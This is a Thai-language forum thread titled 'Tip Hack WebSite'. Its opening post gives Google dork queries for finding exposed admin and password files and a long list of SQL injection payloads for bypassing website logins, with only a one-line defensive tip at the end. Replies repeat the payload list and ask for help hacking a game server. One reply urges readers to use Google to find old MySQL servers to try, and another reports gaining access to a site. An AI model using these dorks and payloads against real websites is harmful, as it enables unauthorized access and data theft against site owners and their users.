Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: Tip Hack WebSite

  1. #1
    Junior Member
    Join Date
    Oct 2007
    Posts
    1


    tip เทคนิกในวันนี้เราจะเสนอการเจาะweb siteแบบง่ายๆให้ทุกท่านได้รับรู้และป้องกันตัวเองได้โดยเริ่มจาก

    การใช้ Google ค้นหาข้อมูลลับ

    "Index of /admin"
    "Index of /password"
    "Index of /" +passwd
    "Index of /" +password.txt
    "Index of /mail"
    "Index of /" +alluser
    "Index of /" +alluser.txt
    "Index of /" +.htaccess

    คำสั่งอาจจะมากกว่านี้ลองเอาไปประยุกต์ใช้กันดู


    คำสั่งเจาะระบบ login

    or''='
    ' or 0=0 --
    " or 0=0 --
    or 0=0 --
    ' or 0=0 #
    " or 0=0 #
    or 0=0 #
    ' or 'x'='x
    " or "x"="x
    &#39 or ('x'='x
    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or a=a--
    " or "a"="a
    &#39 or ('a'='a
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 --
    hi' or 1=1 --
    hi' or 'a'='a
    hi&#39 or ('a'='a
    hi") or ("a"="a


    อันนี้เป็นการ Hack เว็บที่ใช้ฐานข้อมูลเป็น SQL ซึ่งตามที่ต่างๆก็จะอุด Bug ตรงส่วนนี้ไว้เรียบร้อยแล้ว
    แต่ก็มีบางเว็บ site (Script เขียนเองซึ่งมักจะเป็นเว็บไซต์ของโรงเรียนหรือเว็บส่วนบุคคล) ที่มักจะมีรูรั่วนี้
    ออกมาให้เห็น
    หลังจากที่การ Login ค่าที่เป็นไปได้หลังจากการ login ก็คือ
    1.ได้รับสิทธิ์ของ User นั้นๆ
    2.ได้รับสิทธ์เท่ากับคนอื่นๆ
    3.ได้รับสิทธ์เป็นผู้ใช้ที่อยู่อันดับแรกหรือท้ายของตาราง (admin)
    4. ไม่ได้อะไร

    นอกจากการอัดฉีดคำสั่งเหล่านี้ลงไปแล้วนั้นยังมีคำสั่งอื่นๆที่สามารถอัดลงไปได้อีกเช่น
    SELECT * FROM User WHERE
    SELECT * FROM * WHERE
    'GROUP BY username;--
    'employee.feild'
    เป็นต้นซึ่งเป็นคำสั่ง SQL สามารถหาความรู้ได้จากที่ต่างๆใน internet

    การป้องกันโดยพื้นฐานนั้นก็คือการกรองค่าอักขระแบบแปลกๆออกไปจากข้อความที่รับเข้ามาเช่น
    &!@#$%^ เป็นต้นหรือการจำกัดความยาวของช่องรับข้อความก็เป็นอีกหนึ่งวิธีที่น่าสนใจ

  2. #2
    Junior Member
    Join Date
    Jan 2010
    Posts
    26


    งง ครับ ใช้กับโปรเเกรมอะไรอะครับ เเล้วไปพิมพ์ตรงไหน

    สอน hack ro เถื่อนหน่อยดิ

  3. #3
    Junior Member
    Join Date
    Feb 2010
    Posts
    11


    ถ้าเกิดเข้าใจไม่ผิดนะ

    คำสั่งชุดแรกที่ให้มาใช้เซิร์ทหาในกลูเกิลเพื่อนหา user หรือ pass ของเว็บไซต์ต่างๆ

    ส่วนคำสั่งชุดที่สองเป็นบัคของ mysql ที่ใช้กรอกลงไปในช่องที่ปรกติต้องกรอกเป็น user หรือpass มันจะไปแทนที่แล้วถ้าเกิดว่าเค้าไม่ได้กันเอาไว้มันก็จะเข้าไปใช้ได้ อย่างที่เจ้าของโพสต์บอกน่ะแหละ


    แต่เรายังไม่เคยลองใช้ได้เลย เดี๋ยวนี้เค้ามีสอนอุดกันเยอะแล้ว

  4. #4
    Member Cyanide's Avatar
    Join Date
    May 2009
    Location
    Bangkok
    Posts
    51


    คำสั่งเจาะระบบ login

    or''='
    ' or 0=0 --
    " or 0=0 --
    or 0=0 --
    ' or 0=0 #
    " or 0=0 #
    or 0=0 #
    ' or 'x'='x
    " or "x"="x
    &#39 or ('x'='x
    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or a=a--
    " or "a"="a
    &#39 or ('a'='a
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 --
    hi' or 1=1 --
    hi' or 'a'='a
    hi&#39 or ('a'='a
    hi") or ("a"="a
    [/b]
    เป็น SQL Injection ครับ ถ้าเข้าใจไม่ผิดนะ
    อย่างที่ท่าน wzonline บอก แหละครับ ใส่ไปแทน user และ pws
    Peakyu♥

  5. #5
    Member
    Join Date
    Jul 2009
    Location
    Dindaeng
    Posts
    51


    เด่วนี้ mysql เวอร์ชั่นใหม่ๆได้แก้ปัญหาการ hack ในรูปแบบของเจ้าของกระทู้นี้หมดแ้ล้วคับ hack ได้สำหรับเวอร์ชั่นเก่าๆและเก่ามากๆอ่ะครับ ต้องเปลี่ยนไปแฮควิธีอื่นละคับ

  6. #6


    ที่น่าสนใจก็คือ ทุกวันนี้ยังมี MYSQL รุ่นเก่าๆ วิ่งกันอยู่เยอะเหมือนกันนะครับ ลองใช้ google หาดู ยังมีให้ลองอีกหลายที่

  7. #7
    Junior Member
    Join Date
    Mar 2008
    Posts
    11


    คงต้องใช้กลับ ฐานข้อมูลเก่า ๆหรือเปล่าครับหรือว่าผมทำผิดวิธีเข้าได้แต่ ไม่มีสิทธิ์อะไรเลยครับ โดนจำกัดสิทธิ์ในการเข้าไปทำอะไร

  8. #8
    Junior Member CIAAGENT's Avatar
    Join Date
    Apr 2010
    Posts
    11


    เช่นนั้นในการเขียนSQLที่เว็บส่วนตัวนั้นก็ต้องมีความระเอียดรอบคอบมากๆ เลย ไม่งั้นคงมีผู้ไม่หวังดีเจาะเข้ามาเเน่ เเล้วผมจะนำข้อมูลที่ได้ไปใช้อุดช่องโว่ของเว็บโรงเรียนดูนะครับ
    [center]CIA:CENTRAL INTELLIGENCE AGENCY[/center]

    [center]AGENT GAME[/center]

Page 1 of 2 12 LastLast

Similar Threads

  1. Tip Hack WebSite
    By jamesmeku007 in forum Hacking/Security News (ภาษาไทย)
    Replies: 2
    Last Post: 16-04-2010, 10:43 PM
  2. UK Parliament website hack exposes shoddy passwords
    By newsbot in forum World Hacking/Security News
    Replies: 0
    Last Post: 02-09-2009, 06:43 AM
  3. Hack U3 USB Smart Drive to Become Ultimate Hack Tool
    By akira in forum Security Tools
    Replies: 0
    Last Post: 25-11-2007, 03:02 AM
  4. Video How to "hack" a website
    By spirit_hack in forum Hacking Video
    Replies: 0
    Last Post: 15-10-2007, 10:06 PM
  5. Total Training For Website Design: Extreme Website Makeover
    By Tell Me Why in forum E-Book, Video หรือบทความทั่วไปด้าน Computer
    Replies: 0
    Last Post: 16-08-2007, 08:24 AM

Members who have read this thread : 0

Actions : (View-Readers)

There are no names to display.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •